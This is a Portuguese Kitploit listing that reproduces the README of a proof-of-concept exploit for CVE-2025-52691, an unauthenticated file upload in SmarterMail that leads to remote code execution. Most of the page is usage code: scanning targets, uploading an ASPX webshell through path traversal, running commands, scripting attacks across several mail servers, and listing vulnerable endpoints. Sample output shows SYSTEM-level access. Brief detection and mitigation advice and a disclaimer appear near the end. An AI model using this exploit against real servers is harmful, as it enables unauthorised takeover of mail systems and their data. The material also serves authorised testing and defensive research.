Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-52691-poc — Exploit de prova de conceito para CVE-2025-52691: upload arbitrário de arquivos não autenticado levando a RCE no SmarterMail. Inclui scanner de vulnerabilidades, carregador de webshell ASPX e shell interativo para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/rimbadirgantara/cve-2025-52691-poc
Scanners de VulnerabilidadesGeração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
rimbadirgantara/cve-2025-52691-poc

CVE-2025-52691-poc

Exploit de prova de conceito para CVE-2025-52691: upload arbitrário de arquivos não autenticado levando a RCE no SmarterMail. Inclui scanner de vulnerabilidades, carregador de webshell ASPX e shell interativo para testes de segurança autorizados.

Ver Repositório
3há 7 mesesAinda não revisado

CVE-2025-52691 PoC

Prova de Conceito para CVE-2025-52691 - SmarterMail Upload Arbitrário de Arquivos Não Autenticado resultando em RCE

⚠️ Aviso Legal

Apenas para testes de segurança autorizados e fins educacionais. Acesso não autorizado é ilegal.

Visão Geral

Vulnerabilidade crítica no SmarterMail que permite upload arbitrário de arquivos não autenticado via path traversal, levando à Execução Remota de Código.

Vulnerabilidade: Path traversal em endpoints de upload permite o upload de webshells ASPX para a raiz da web
Impacto: Execução Remota de Código Não Autenticada
Vetor: Rede / Não Autenticado

Instalação

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3

Ferramentas

check.py - Scanner de Vulnerabilidade

Escaneia alvos em busca da vulnerabilidade CVE-2025-52691. Salva apenas URLs vulneráveis em um arquivo de saída.

root@kitploit:~
# Alvo único
python check.py https://mail.example.com

# Múltiplos alvos
python check.py -f targets.txt -o results.txt

# Timeout personalizado
python check.py https://mail.example.com -t 30

Saída: Uma URL vulnerável por linha no arquivo results.txt

pwn.py - Ferramenta de Exploit

Faz upload de webshell ASPX e fornece execução de comandos.

root@kitploit:~
# Exploit básico
python pwn.py https://mail.example.com

# Executar comando
python pwn.py https://mail.example.com -c "whoami"

# Shell interativo
python pwn.py https://mail.example.com -i

exploit.py - Biblioteca Python

Módulo de exploração reutilizável para integração em scripts personalizados.

Como Biblioteca:

root@kitploit:~
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

# Uso básico
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)

if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))

# Com timeout personalizado
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()

# Executar múltiplos comandos
if result == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))
    print(exploit.execute_command("hostname"))
    print(exploit.execute_command("ipconfig"))

Como Script Autônomo:

root@kitploit:~
# Importar e executar em Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"

# Criar script personalizado
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
    config = TargetConfig(base_url=target)
    exploit = SmarterMailExploit(config)
    if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
        print(f"[+] Exploited: {target}")
        print(exploit.execute_command("whoami"))
EOF
python my_exploit.py

Detalhes Técnicos

Endpoints Vulneráveis:

root@kitploit:~
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx

Métodos de Exploração:

  • Upload de formulário multipart com path traversal (../wwwroot/)
  • POST bruto com cabeçalhos personalizados
  • Payload JSON com conteúdo codificado em base64

Webshell: Shell ASPX minimalista que aceita comandos via parâmetro ?cmd=

Fluxo de Ataque

  1. Escanear alvo: python check.py <target>
  2. Explorar: python pwn.py <target> -i
  3. Executar comandos no shell interativo

Detecção e Mitigação

Detecção:

  • Monitorar uploads de arquivos ASPX para diretórios web
  • Verificar logs por padrões de path traversal (../)
  • Alertar sobre requisições inesperadas para /api/upload

Mitigação:

  • Atualizar SmarterMail para a versão mais recente
  • Implementar validação rigorosa de caminhos de arquivo
  • Implantar WAF com filtragem de upload
  • Exigir autenticação em endpoints de upload

Exemplo

root@kitploit:~
$ python pwn.py https://mail.example.com -c "whoami"

[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx

[*] Executing: whoami
[+] Output:
nt authority\system

Sempre obtenha autorização adequada antes de testar.

Baixar ferramenta